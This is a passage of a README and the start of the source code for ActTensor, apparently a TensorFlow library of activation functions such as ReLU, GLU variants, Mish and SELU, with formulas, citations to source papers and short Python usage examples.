<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/HardShrink.png">
</p>
3. GLU:
<img src="https://latex.codecogs.com/svg.image?&space;GLU\left&space;(&space;a,b&space;&space;\right&space;)=&space;a&space;\oplus&space;\sigma&space;\left&space;(&space;b&space;\right&space;)">
<p align="center">
<img width="700" height="500" src="https://production-media.paperswithcode.com/methods/new_architecture_8UYjVkL.jpg">
</p>
* [Source Paper : Language Modeling with Gated Convolutional Networks](http://arxiv.org/abs/1612.08083v3)
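A minimal sketch of what the `GLU` layer class in this package does: it splits its input in half along the chosen axis and gates one half with the sigmoid of the other, so that axis must have an even size.
```python
import tensorflow as tf
from ActTensor_tf import GLU

x = tf.random.normal((4, 16))  # batch of 4, feature dimension 16
y = GLU()(x)                   # shape (4, 8): first half * sigmoid(second half)
```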
4. Bilinear:
* [Source Paper : Parameter Efficient Deep Neural Networks with Bilinear Projections](https://arxiv.org/pdf/2011.01391)
5. ReGLU:
ReGLU is an activation function which is a variant of GLU.
<img src="https://latex.codecogs.com/svg.image?ReGLU\left&space;(&space;x,&space;W,&space;V,&space;b,&space;c&space;\right&space;)=&space;max(0,&space;xW&space;+&space;b)&space;\oplus&space;(xV&space;+&space;b)">
* [Source Paper : GLU Variants Improve Transformer](https://arxiv.org/abs/2002.05202v1)
6. GeGLU:
GeGLU is an activation function which is a variant of GLU.
<img src="https://latex.codecogs.com/svg.image?GeGLU\left&space;(&space;x,&space;W,&space;V,&space;b,&space;c&space;\right&space;)=&space;GELU(xW&space;+&space;b)&space;\oplus&space;(xV&space;+&space;b)">
* [Source Paper : GLU Variants Improve Transformer](https://arxiv.org/abs/2002.05202v1)
7. SwiGLU:
SwiGLU is an activation function which is a variant of GLU.
<img src="https://latex.codecogs.com/svg.image?SwiGLU\left&space;(&space;x,&space;W,&space;V,&space;b,&space;c&space;\right&space;)=&space;Swish_b(xW&space;+&space;b)&space;\oplus&space;(xV&space;+&space;b)">
* [Source Paper : GLU Variants Improve Transformer](https://arxiv.org/abs/2002.05202v1)
8. SeGLU:
SeGLU is an activation function which is a variant of GLU.
9. ReLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x&space;&&space;x&space;\geq&space;0\\0&space;&&space;x&space;<&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/ReLU.png">
</p>
* [Source Paper : Nair, Vinod, and Geoffrey E. Hinton. "Rectified linear units improve restricted boltzmann machines." In Icml. 2010.](https://www.cs.toronto.edu/~fritz/absps/reluICML.pdf)
10. Identity:
$f(x) = x$
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Identity.png">
</p>
11. Step:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}1&space;&&space;x&space;>&space;0\\0&space;&&space;x&space;\leq&space;0\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Step.png">
</p>
12. Sigmoid:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\frac{1}{1+e^{-x}}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Sigmoid.png">
</p>
* [Source Paper : Han, Jun, and Claudio Moraga. "The influence of the sigmoid function parameters on the speed of backpropagation learning." In International workshop on artificial neural networks, pp. 195-201. Springer, Berlin, Heidelberg, 1995.](https://link.springer.com/chapter/10.1007/3-540-59497-3_175)
13. Hard Sigmoid:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;max(0,&space;min(1,\frac{x+1}{2}))">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/HardSigmoid.png">
</p>
* [Source Paper : Courbariaux, Matthieu, Yoshua Bengio, and Jean-Pierre David. "Binaryconnect: Training deep neural networks with binary weights during propagations." Advances in neural information processing systems 28 (2015).](https://arxiv.org/abs/1511.00363)
14. Log Sigmoid:
<img src="https://latex.codecogs.com/svg.image?LogSigmoid(x)=\log\left(\dfrac{1}{1+\exp(-x_i)}\right)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/LogSigmoid.png">
</p>
15. SiLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;x(\frac{1}{1+e^{-x}})">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/SiLU.png">
</p>
* [Source Paper : Elfwing, Stefan, Eiji Uchibe, and Kenji Doya. "Sigmoid-weighted linear units for neural network function approximation in reinforcement learning." Neural Networks 107 (2018): 3-11.](https://arxiv.org/abs/1702.03118)
16. ParametricLinear:
$f(x) = a*x$
17. PiecewiseLinear:
Choose some xmin and xmax as the "range". Everything below this range maps to 0, everything above it maps to 1, and anything in between is linearly interpolated (a short numeric sketch follows the plot below).
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\begin{cases}0&space;&&space;x&space;<&space;x_{min}\\&space;mx&space;+&space;b&space;&&space;x_{min}&space;<&space;x&space;<&space;x_{max}\\&space;1&space;&&space;x&space;>&space;x_{xmax}&space;\end{cases}">
<img src="https://latex.codecogs.com/svg.image?m&space;=&space;\frac{1}{x_{max}&space;-&space;x_{min}}">
<img src="https://latex.codecogs.com/svg.image?b&space;=&space;-mx_{min}&space;=&space;1&space;-&space;mx_{max}">
<p align="center">
<img width="700" height="400" src="https://i.stack.imgur.com/cguIH.png">
</p>
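A short numeric sketch (assuming the functional form `piecewise_linear` is exported like `relu` above; the values are arbitrary):
```python
import tensorflow as tf
from ActTensor_tf import piecewise_linear

x = tf.constant([-2.0, 0.0, 2.0])
y = piecewise_linear(x, xmin=-1.0, xmax=1.0)  # below xmin -> 0, inside -> interpolated, above xmax -> 1
# y == [0.0, 0.5, 1.0]
```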
18. Complementary Log-Log (CLL):
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;1-e^{-e^x}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Complementary%20Log-Log.png">
</p>
* [Source Paper : Gomes, Gecynalda S. da S., and Teresa B. Ludermir. "Complementary log-log and probit: activation functions implemented in artificial neural networks." In 2008 Eighth International Conference on Hybrid Intelligent Systems, pp. 939-942. IEEE, 2008.](https://www.computer.org/csdl/proceedings-article/his/2008/3326a939/12OmNxHrykP)
19. Bipolar:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}-1&space;&&space;x&space;\leq&space;0\\1&space;&&space;x&space;>&space;0\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Bipolar.png">
</p>
20. Bipolar Sigmoid:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\frac{1-e^{-x}}{1+e^{-x}}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/BipolarSigmoid.png">
</p>
* [Source Paper : Mansor, Mohd Asyraf, and Saratha Sathasivam. "Activation function comparison in neural-symbolic integration." In AIP Conference Proceedings, vol. 1750, no. 1, p. 020013. AIP Publishing LLC, 2016.](https://aip.scitation.org/doi/10.1063/1.4954526)
21. Tanh:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\frac{e^{x}-e^{-x}}{e^{x}+e^{-x}}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/tanh.png">
</p>
* [Source Paper : Harrington, Peter de B. "Sigmoid transfer functions in backpropagation neural networks." Analytical Chemistry 65, no. 15 (1993): 2167-2168.](https://pubs.acs.org/doi/pdf/10.1021/ac00063a042)
22. Tanh Shrink:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;x-tanh(x)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/tanhShrink.png">
</p>
23. LeCunTanh:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;1.7159\&space;tanh(\frac{2}{3}x)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/LeCunTanh.png">
</p>
* [Source Paper : LeCun, Yann A., Léon Bottou, Genevieve B. Orr, and Klaus-Robert Müller. "Efficient backprop." In Neural networks: Tricks of the trade, pp. 9-48. Springer, Berlin, Heidelberg, 2012.](http://yann.lecun.com/exdb/publis/pdf/lecun-98b.pdf)
24. Hard Tanh:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}-1&space;&&space;x&space;<&space;-1\\x&space;&&space;-1&space;\leq&space;x&space;\leq&space;1\\1&space;&&space;x&space;>&space;1&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/HardTanh.png">
</p>
25. TanhExp:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;x\&space;tanh(e^x)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/TanhExp.png">
</p>
* [Source Paper : Liu, Xinyu, and Xiaoguang Di. "TanhExp: A smooth activation function with high convergence speed for lightweight neural networks." IET Computer Vision 15, no. 2 (2021): 136-150.](https://arxiv.org/abs/2003.09855)
26. ABS:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;|x|">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Abs.png">
</p>
27. SquaredReLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x^2&space;&&space;x&space;\geq&space;0\\0&space;&&space;x&space;<&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/SquaredReLU.png">
</p>
* [Source Paper : So, David, Wojciech Mańke, Hanxiao Liu, Zihang Dai, Noam Shazeer, and Quoc V. Le. "Searching for Efficient Transformers for Language Modeling." Advances in Neural Information Processing Systems 34 (2021): 6010-6022.](https://arxiv.org/abs/2109.08668)
28. ParametricReLU (PReLU):
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x&space;&&space;x&space;\geq&space;0\\&space;\alpha&space;x&space;&&space;x&space;<&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/PReLU.png">
</p>
* [Source Paper : He, Kaiming, Xiangyu Zhang, Shaoqing Ren, and Jian Sun. "Delving deep into rectifiers: Surpassing human-level performance on imagenet classification." In Proceedings of the IEEE international conference on computer vision, pp. 1026-1034. 2015.](https://arxiv.org/abs/1502.01852)
29. RandomizedReLU (RReLU):
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x&space;&&space;x&space;\geq&space;0\\&space;\alpha&space;x&space;&&space;x&space;<&space;0&space;\end{cases}">
<img src="https://latex.codecogs.com/svg.image?a&space;\sim&space;U(l,u)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/RReLU.png">
</p>
* [Source Paper : Xu, Bing, Naiyan Wang, Tianqi Chen, and Mu Li. "Empirical evaluation of rectified activations in convolutional network." arXiv preprint arXiv:1505.00853 (2015).](https://arxiv.org/abs/1505.00853?context=cs)
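A minimal usage sketch of the functional form (assuming `Randomized_ReLU` is exported like `relu` above); `lower` and `upper` bound the uniformly sampled negative slope:
```python
import tensorflow as tf
from ActTensor_tf import Randomized_ReLU

x = tf.constant([-2.0, -0.5, 1.0])
y = Randomized_ReLU(x, lower=0.1, upper=0.3)  # negative inputs scaled by one slope drawn from U(0.1, 0.3)
```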
30. LeakyReLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x&space;&&space;x&space;\geq&space;0\\&space;0.01&space;x&space;&&space;x&space;<&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/LeakyReLU.png">
</p>
31. ReLU6:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;min(6,&space;max(0,x))">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/ReLU6.png">
</p>
* [Source Paper : Howard, Andrew G., Menglong Zhu, Bo Chen, Dmitry Kalenichenko, Weijun Wang, Tobias Weyand, Marco Andreetto, and Hartwig Adam. "Mobilenets: Efficient convolutional neural networks for mobile vision applications." arXiv preprint arXiv:1704.04861 (2017).](https://arxiv.org/abs/1704.04861)
32. ModReLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}(|x|+b)\frac{x}{|x|}&space;&&space;|x|+b&space;\geq&space;0&space;\\0&space;&&space;|x|+b&space;\leq&space;0\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/ModReLU.png">
</p>
* [Source Paper : Arjovsky, Martin, Amar Shah, and Yoshua Bengio. "Unitary evolution recurrent neural networks." In International conference on machine learning, pp. 1120-1128. PMLR, 2016.](https://arxiv.org/abs/1511.06464?context=stat)
33. CosReLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;max(0,x)&space;+&space;cos(x)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/CosRelu.png">
</p>
34. SinReLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;max(0,x)&space;+&space;sin(x)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/SinReLU.png">
</p>
35. Probit:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\sqrt{2}\&space;\&space;erfinv(2x&space;-&space;1)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Probit.png">
</p>
36. Cosine:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;Cos(x)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Cosine.png">
</p>
37. Gaussian:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;e^{-\frac{1}{2}x^2}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Gaussian.png">
</p>
38. Multiquadratic:
Choose some fixed point (x, y); the input z is mapped to its distance from that point (a short usage sketch follows the plot below).
<img src="https://latex.codecogs.com/svg.image?\rho(z)&space;=&space;\sqrt{(z&space;-&space;x)^{2}&space;+&space;y^{2}}&space;">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Multiquadratic.png">
</p>
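A minimal usage sketch of the functional form (assuming `Multi_quadratic` is exported like `relu` above; note that `px` and `py` must be floats):
```python
import tensorflow as tf
from ActTensor_tf import Multi_quadratic

x = tf.constant([-1.0, 0.0, 3.0])
y = Multi_quadratic(x, px=1.0, py=2.0)  # sqrt((x - 1)^2 + 2^2) -> approximately [2.83, 2.24, 2.83]
```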
39. InvMultiquadratic:
<img src="https://latex.codecogs.com/svg.image?\rho(z)&space;=&space;\frac{1}{\sqrt{(z&space;-&space;x)^{2}&space;+&space;y^{2}}&space;}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/InvMultiquadratic.png">
</p>
40. SoftPlus:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;ln(1+e^x)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/SoftPlus.png">
</p>
* [Source Paper : Dugas, Charles, Yoshua Bengio, François Bélisle, Claude Nadeau, and René Garcia. "Incorporating second-order functional knowledge for better option pricing." Advances in neural information processing systems 13 (2000).](http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.966.2210&rep=rep1&type=pdf)
41. Mish:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;x\&space;tanh(SoftPlus(x))">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Mish.png">
</p>
* [Source Paper : Misra, Diganta. "Mish: A self regularized non-monotonic neural activation function." arXiv preprint arXiv:1908.08681 4, no. 2 (2019): 10-48550.](https://arxiv.org/abs/1908.08681)
42. Smish:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;x\&space;tanh(log(1+Sigmoid(x)))">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Smish.png">
</p>
43. ParametricSmish (PSmish):
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;a\&space;tanh(log(1+Sigmoid(b)))">
<img src="https://latex.codecogs.com/svg.image?a=&space;\alpha&space;x">
<img src="https://latex.codecogs.com/svg.image?b=&space;\beta&space;x">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/PSmish.png">
</p>
44. Swish:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\frac{x}{1+e^{-\beta&space;x}}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Swish.png">
</p>
* [Source Paper : Ramachandran, Prajit, Barret Zoph, and Quoc V. Le. "Searching for activation functions." arXiv preprint arXiv:1710.05941 (2017).](https://arxiv.org/abs/1710.05941?context=cs.LG)
45. ESwish:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\beta\&space;\frac{x}{1+e^{-\beta&space;x}}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/ESwish.png">
</p>
* [Source Paper : Alcaide, Eric. "E-swish: Adjusting activations to different network depths." arXiv preprint arXiv:1801.07145 (2018).](https://arxiv.org/pdf/1801.07145)
46. Hard Swish:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;x\&space;\frac{ReLU6(x+3)}{6}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/HardSwish.png">
</p>
* [Source Paper : Howard, Andrew, Mark Sandler, Grace Chu, Liang-Chieh Chen, Bo Chen, Mingxing Tan, Weijun Wang et al. "Searching for mobilenetv3." In Proceedings of the IEEE/CVF international conference on computer vision, pp. 1314-1324. 2019.](https://ieeexplore.ieee.org/document/9008835)
47. GCU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;x\&space;cos(x)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/GCU.png">
</p>
* [Source Paper : Noel, Mathew Mithra, Advait Trivedi, and Praneet Dutta. "Growing cosine unit: A novel oscillatory activation function that can speedup training and reduce parameters in convolutional neural networks." arXiv preprint arXiv:2108.12943 (2021).](https://deepai.org/publication/growing-cosine-unit-a-novel-oscillatory-activation-function-that-can-speedup-training-and-reduce-parameters-in-convolutional-neural-networks)
48. CoLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\frac{x}{1-x&space;e^{-(x+e^x)}}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/CoLU.png">
</p>
* [Source Paper : Vagerwal, Advait. "Deeper Learning with CoLU Activation." arXiv preprint arXiv:2112.12078 (2021).](https://arxiv.org/abs/2112.12078)
49. PELU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}cx&space;&&space;x&space;>&space;0\\&space;\alpha&space;e^{\frac{x}{b}}-1&space;&&space;x&space;\leq&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/PELU.png">
</p>
* [Source Paper : Trottier, Ludovic, Philippe Giguere, and Brahim Chaib-Draa. "Parametric exponential linear unit for deep convolutional neural networks." In 2017 16th IEEE International Conference on Machine Learning and Applications (ICMLA), pp. 207-214. IEEE, 2017.](https://arxiv.org/abs/1605.09332?context=cs)
50. SELU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\lambda\begin{cases}x&space;&&space;x&space;\geq&space;0\\&space;\alpha(e^{x}-1)&space;&&space;x&space;<&space;0\end{cases}">
where $\alpha \approx 1.6733$ & $\lambda \approx 1.0507$
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/SELU.png">
</p>
* [Source Paper : Klambauer, Günter, Thomas Unterthiner, Andreas Mayr, and Sepp Hochreiter. "Self-normalizing neural networks." Advances in neural information processing systems 30 (2017).](https://papers.nips.cc/paper/6698-self-normalizing-neural-networks)
51. CELU:
<img src="https://latex.codecogs.com/svg.image?CELU\left&space;(&space;x&space;\right&space;)=&space;max(0,&space;x)&space;+&space;min(0&space;,&space;\alpha&space;(e^{\frac{x}{\alpha&space;}}&space;-1))">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/CELU.png">
</p>
* [Source Paper : Barron, Jonathan T. "Continuously differentiable exponential linear units." arXiv preprint arXiv:1704.07483 (2017).](https://arxiv.org/abs/1704.07483)
52. ArcTan:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\arctan(x)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/ArcTan.png">
</p>
53. ShiftedSoftPlus:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;log(0.5+0.5e^x)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/ShiftedSoftPlus.png">
</p>
* [Source Paper : Schütt, Kristof, Pieter-Jan Kindermans, Huziel Enoc Sauceda Felix, Stefan Chmiela, Alexandre Tkatchenko, and Klaus-Robert Müller. "Schnet: A continuous-filter convolutional neural network for modeling quantum interactions." Advances in neural information processing systems 30 (2017).](https://dl.acm.org/doi/abs/10.5555/3294771.3294866)
54. Softmax:
<img src="https://latex.codecogs.com/svg.image?f(x)_i&space;=&space;\frac{e^{x_i}}{\sum_j&space;e^{x_j}}">
* [Source Paper : Gold, Steven, and Anand Rangarajan. "Softmax to softassign: Neural network algorithms for combinatorial optimization." Journal of Artificial Neural Networks 2, no. 4 (1996): 381-399.](https://www.cise.ufl.edu/~anand/pdf/jannsub.pdf)
55. Logit:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\frac{x}{1-x}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Logit.png">
</p>
56. GELU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;x\&space;\Phi(x)">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/GELU.png">
</p>
57. Softsign:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;\frac{x}{|x|+1}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Softsign.png">
</p>
58. ELiSH:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}\frac{x}{1+e^{-x}}&space;&&space;x&space;\geq&space;0\\&space;\frac{e^x-1}{1+e^{-x}}&space;&&space;x&space;<&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/ELiSH.png">
</p>
* [Source Paper : Basirat, Mina, and Peter M. Roth. "The quest for the golden activation function." arXiv preprint arXiv:1808.00783 (2018).](https://arxiv.org/abs/1808.00783)
59. Hard ELiSH:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x\&space;max(0,min(1,\frac{x+1}{2}))&space;&&space;x&space;\geq&space;0\\&space;(e^x-1)&space;max(0,min(1,\frac{x+1}{2}))&space;&&space;x&space;<&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/HardELiSH.png">
</p>
* [Source Paper : Basirat, Mina, and Peter M. Roth. "The quest for the golden activation function." arXiv preprint arXiv:1808.00783 (2018).](https://arxiv.org/abs/1808.00783)
60. Serf:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;x\&space;erf(ln(1+e^x))">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Serf.png">
</p>
* [Source Paper : Nag, Sayan, and Mayukh Bhattacharyya. "SERF: Towards better training of deep neural networks using log-Softplus ERror activation Function." arXiv preprint arXiv:2108.09598 (2021).](https://arxiv.org/abs/2108.09598?context=cs)
61. ELU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x&space;&&space;x&space;>&space;0\\&space;\alpha&space;(exp(x)-1)&space;&&space;x&space;\leq&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/ELU.png">
</p>
* [Source Paper : Clevert, Djork-Arné, Thomas Unterthiner, and Sepp Hochreiter. "Fast and accurate deep network learning by exponential linear units (elus)." arXiv preprint arXiv:1511.07289 (2015).](https://dblp.org/rec/journals/corr/ClevertUH15)
62. Phish:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=&space;x\&space;tanh(gelu(x))">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/Phish.png">
</p>
* [Source Paper : Naveen, Philip. "Phish: A novel hyper-optimizable activation function." (2022).](https://www.techrxiv.org/articles/preprint/Phish_A_Novel_Hyper-Optimizable_Activation_Function/17283824/2)
63. QReLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x&space;&&space;x&space;>&space;0\\&space;0.01\&space;x(x-2)&space;&&space;x&space;\leq&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/QReLU.png">
</p>
* [Source Paper : Parisi, Luca, Daniel Neagu, Renfei Ma, and Felician Campean. "QReLU and m-QReLU: Two novel quantum activation functions to aid medical diagnostics." arXiv preprint arXiv:2010.08031 (2020).](https://arxiv.org/abs/2010.08031)
64. m-QReLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x&space;&&space;x&space;>&space;0\\&space;0.01\&space;x&space;-x&space;&&space;x&space;\leq&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/m-QReLU.png">
</p>
* [Source Paper : Parisi, Luca, Daniel Neagu, Renfei Ma, and Felician Campean. "QReLU and m-QReLU: Two novel quantum activation functions to aid medical diagnostics." arXiv preprint arXiv:2010.08031 (2020).](https://arxiv.org/abs/2010.08031)
65. FReLU:
<img src="https://latex.codecogs.com/svg.image?f(x)&space;=\begin{cases}x+b&space;&&space;x&space;>&space;0\\&space;b&space;&&space;x&space;\leq&space;0&space;\end{cases}">
<p align="center">
<img width="700" height="400" src="https://github.com/pouyaardehkhani/ActTensor/raw/master/images/FReLU.png">
</p>
* [Source Paper : Qiu, Suo, Xiangmin Xu, and Bolun Cai. "FReLU: flexible rectified linear units for improving convolutional neural networks." In 2018 24th international conference on pattern recognition (icpr), pp. 1223-1228. IEEE, 2018.](https://arxiv.org/abs/1706.08098)
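Most of the parameter-free activations above drop into a model exactly like the `ReLU` layer in the usage section. A minimal sketch (layer sizes are arbitrary, and it assumes the parameter-free layer classes such as `Mish` and `GCU` take no constructor arguments):
```python
import tensorflow as tf
from ActTensor_tf import Mish, GCU

model = tf.keras.models.Sequential([tf.keras.layers.Flatten(),
                                    tf.keras.layers.Dense(128),
                                    Mish(),  # x * tanh(softplus(x))
                                    tf.keras.layers.Dense(64),
                                    GCU(),   # x * cos(x)
                                    tf.keras.layers.Dense(10, activation=tf.nn.softmax)])
```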
## Cite this repository
```bibtex
@software{Pouya_ActTensor_2022,
author = {Pouya, Ardehkhani and Pegah, Ardehkhani},
license = {MIT},
month = {7},
title = {{ActTensor}},
url = {https://github.com/pouyaardehkhani/ActTensor},
version = {1.0.0},
year = {2022}
}
```
import tensorflow as tf
import numpy as np
from keras import backend as K
def hard_shrink(x, lamd):
"""
Hard Shrinkage (Hardshrink) Activation Function
Parameters
----------
x : tensor object
lamd : int, float
Returns
-------
tensor
"""
    x = tf.where((x >= -lamd) & (x <= lamd), tf.zeros_like(x), x)  # zero inside [-lamd, lamd], keep values outside
return x
def relu(x):
"""
Rectified Linear Unit Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
x = tf.where(x>0, x, 0)
return x
def identity(x):
"""
Linear Activation Function f(x)=x
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return x
def step(x):
"""
Binary Step Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
x = tf.where(x>0,1,0)
return x
def sigmoid(x):
"""
Sigmoid Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return 1/(1 + tf.math.exp(-x))
def hard_sigmoid(x):
"""
Hard Sigmoid Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.maximum(0., tf.math.minimum(1., (x + 1.)/2.))
def log_sigmoid(x):
"""
LogSigmoid Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.log(sigmoid(x))
def silu(x):
"""
Sigmoid Linear Unit Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
    return x / (1. + tf.math.exp(-x))  # x * sigmoid(x)
def parametric_linear(x, a):
"""
Linear Activation Function with parameter a
Parameters
----------
x : tensor object
a : int, float
alpha weight for x.
Returns
-------
tensor
"""
return a * x
def piecewise_linear(x, xmin, xmax):
"""
Piecewise Linear Activation Function
